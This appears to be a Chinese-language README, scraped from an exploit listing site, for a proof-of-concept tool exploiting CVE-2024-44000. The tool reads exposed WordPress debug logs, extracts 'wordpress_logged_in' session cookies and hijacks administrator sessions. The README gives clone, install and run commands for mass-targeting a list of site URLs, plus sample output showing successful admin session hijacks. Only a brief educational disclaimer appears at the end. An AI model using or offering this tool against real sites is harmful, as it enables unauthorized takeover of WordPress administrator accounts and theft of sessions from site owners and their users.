Share
## https://sploitus.com/exploit?id=169C740C-DE81-5B0C-BEB1-4149455BC938
# CVE-2024-44000-poc
**GenCookieSessionHijack** 是一个用于利用不安全暴露的 WordPress 调试日志并提取会话 Cookie 的 PoC 工具。通过该工具,攻击者可以劫持活跃的管理员会话,从而未授权地访问 WordPress 管理控制台。
## 功能特点
- 从 WordPress 调试日志中提取 Cookie。
- 识别和筛选会话 Cookie(例如 `wordpress_logged_in`)。
- 自动尝试劫持会话以获取管理员权限。
- 在浏览器中直接打开已劫持的管理员会话。
## 使用方法
### 安装
```bash
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
```
### 运行工具
1. 准备一个包含目标 WordPress URL 的文件,每行一个 URL(例如,`list.txt`)。
2. 使用以下命令运行工具:
```bash
python GenCookieSessionHijack.py -f list.txt -o result.txt
```
### 参数说明
- `-f, --file`:包含 URL 列表的文件路径(默认值:`list.txt`)。
- `-o, --output`:保存结果的文件(默认值:`result.txt`)。
## 使用示例
```bash
python GenCookieSessionHijack.py -f targets.txt -o output.txt
```
这将从 `targets.txt` 中读取 URL 列表,尝试提取并使用会话 Cookie,并将结果保存到 `output.txt` 中。
## 输出结果
如果会话劫持成功,工具将生成包含劫持的管理员会话 Cookie 的 URL,并直接在默认浏览器中打开。
### 输出示例:
```
[+] 成功获取日志文件来自 http://example.com
[+] 找到 session cookies 对应于 http://example.com:
wordpress_logged_in_abcdef123456
[+] 成功劫持管理员会话,使用 cookie:wordpress_logged_in_abcdef123456
[+] 劫持会话的 URL:http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] 已设置的 cookie:http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] 未能劫持管理员会话,使用 cookie:wordpress_logged_in_invalidcookie
[-] 在日志中未找到 session cookies 对应于 http://another-example.com
[-] 未能获取日志文件来自 http://another-example.com。响应代码:404
```
## 法律声明
此工具仅供教育用途,不得用于非法活动。作者对因使用该工具造成的任何不当行为或损害概不负责。